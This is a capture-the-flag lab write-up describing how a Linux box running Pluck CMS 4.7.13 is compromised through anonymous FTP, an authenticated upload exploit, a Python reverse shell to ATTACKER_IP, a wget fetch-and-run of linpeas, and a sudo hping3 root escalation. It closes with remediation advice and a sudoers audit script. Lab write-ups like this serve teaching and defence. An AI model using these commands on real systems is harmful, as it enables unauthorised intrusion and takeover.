Platform: Cyber Academy (controlled lab environment)
Difficulty: Easy
OS: Linux
Anonymous FTP Login
→ Credential Disclosure (Creds.txt)
→ Pluck CMS Admin Panel Access
→ Remote Code Execution (CVE / 49909.py)
→ Webshell → Reverse Shell (www-data)
→ sudo -l → hping3 NOPASSWD
→ Root Shell (GTFOBins)
| Property | Value |
|---|---|
| IP | 192.168.x.x |
| OS | Linux |
| Open Ports | 21 (FTP), 22 (SSH), 80 (HTTP), 38080 (HTTP) |
| Web App | Pluck CMS 4.7.13 |
| FTP | vsftpd 3.0.3 |
Tool: nmap
```bash
nmap -p 21,22,80,38080 -A 192.168.x.x
```

Findings:
- Port 21: vsftpd 3.0.3 — anonymous login enabled
- Port 38080: Pluck CMS 4.7.13 running on HTTP
- Port 22: SSH open (not used in this chain)
📸 screenshots/nmap_scan.png
Tool: ftp
Anonymous FTP login was permitted without credentials.
```bash
ftp 192.168.x.x
# Login: anonymous / (blank)
ls
get Creds.txt
bye
# Back on the local machine
cat Creds.txt
```

Finding: A plaintext file, Creds.txt, was publicly accessible and contained valid credentials for the Pluck CMS admin panel.
📸 screenshots/ftp_anonymous.png
📸 screenshots/creds_txt.png
Vulnerability: Anonymous FTP enabled + sensitive file exposed without access control.
Tool: searchsploit, 49909.py
```bash
searchsploit pluck 4.7.13
searchsploit -m 49909.py
python3 49909.py 192.168.x.x 38080 "VeryVerySecurePass" /
```

Pluck CMS 4.7.13 contains an authenticated file upload vulnerability that allows uploading a PHP webshell through the admin panel.
Using credentials obtained from FTP, the exploit authenticated to the panel and uploaded a webshell (p0wny-shell).
📸 screenshots/pluck_panel.png
📸 screenshots/webshell.png
Exploit file: exploits/49909.py
From the webshell, a reverse shell was established back to the attacker machine:
```bash
# On attacker machine
nc -lvnp 4444
# In webshell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
# Upgrade to stable TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Shell obtained as www-data.
📸 screenshots/reverse_shell.png
Tool: linpeas.sh, GTFOBins
LinPEAS was used to enumerate the system for privilege escalation vectors.
```bash
# On attacker machine: serve linpeas
python3 -m http.server 80
# On target
cd /tmp
wget http://ATTACKER_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

LinPEAS flagged a critical sudo misconfiguration. Manual verification:

```bash
sudo -l
```

Output:

```text
User www-data may run the following commands on pucuk:
    (ALL) NOPASSWD: /usr/sbin/hping3
```
📸 screenshots/linpeas.png
hping3 is a network tool with an interactive mode that allows arbitrary command execution. Since it can be run as root without a password, it becomes a direct privilege escalation vector.
Reference: GTFOBins — hping3
```bash
sudo hping3
# Inside hping3 interactive shell:
/bin/bash
```

📸 screenshots/hping3.png
📸 screenshots/root.png
| Vulnerability | Severity | Description |
|---|---|---|
| Anonymous FTP + exposed credentials | High | Creds.txt readable without authentication |
| Pluck CMS 4.7.13 Authenticated RCE | High | File upload leads to remote code execution |
| Sudo misconfiguration (hping3 NOPASSWD) | Critical | www-data can execute hping3 as root |
- Disable anonymous FTP or ensure no sensitive files are stored in accessible directories
- Update Pluck CMS to a patched version; restrict file upload types
- Audit sudoers configuration — remove unnecessary NOPASSWD entries, especially for binaries listed on GTFOBins
- Apply principle of least privilege to all service accounts
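
The sudoers audit recommended above can be partly automated. The following is an added example, not part of the original lab write-up: a Python check that flags NOPASSWD rules for shell-capable binaries. The watchlist and the sample sudoers text are constructed, and the parser assumes plain user rules without aliases, includes, or escaped commas.

```python
import re

# Assumption: constructed subset of GTFOBins sudo shell-escape binaries.
SHELL_ESCAPE_BINARIES = {"hping3", "vim", "find", "awk", "less", "nmap", "tar"}

# Constructed sample sudoers content; only the www-data rule mirrors the page.
SAMPLE_SUDOERS = """\
Defaults env_reset
www-data ALL=(ALL) NOPASSWD: /usr/sbin/hping3
backup   ALL=(root) NOPASSWD: /usr/bin/rsync /srv/ /mnt/backup/, \\
                              /usr/bin/vim /etc/rsyncd.conf
deploy   ALL=(ALL) /usr/bin/systemctl restart nginx
%admin   ALL=(ALL) NOPASSWD: ALL
"""

RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?P<spec>.+)$")

def audit_sudoers(text):
    """Return (principal, command, reason) for each risky NOPASSWD command."""
    findings = []
    # Join backslash-continued lines before parsing.
    logical = re.sub(r"\\\n\s*", " ", text).splitlines()
    for line in logical:
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = False
        for cmd in m.group("spec").split(","):
            cmd = re.sub(r"^\([^)]*\)\s*", "", cmd.strip())  # drop (runas)
            # Tags such as NOPASSWD: persist for later commands in the list.
            while (tag := re.match(r"^([A-Z_]+):\s*", cmd)):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag.group(1), nopasswd)
                cmd = cmd[tag.end():]
            if not nopasswd or not cmd:
                continue
            binary = cmd.split()[0]
            if binary == "ALL":
                findings.append((m.group("who"), cmd, "unrestricted NOPASSWD"))
            elif binary.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES:
                findings.append((m.group("who"), cmd, "shell-escape binary"))
    return findings

if __name__ == "__main__":
    for who, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} ({reason})")
```

The backup rule is flagged even though vim is pinned to one file, because an editor started as root can still launch a shell from inside the session.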
| Tool | Purpose |
|---|---|
| nmap | Port and service enumeration |
| ftp | Anonymous FTP access |
| searchsploit | Exploit discovery |
| 49909.py | Pluck CMS RCE exploit |
| linpeas.sh | Privilege escalation enumeration |
| GTFOBins | hping3 sudo privesc reference |
Disclaimer: This lab was conducted in a controlled environment provided by Cyber Academy. All techniques documented here are for educational purposes only.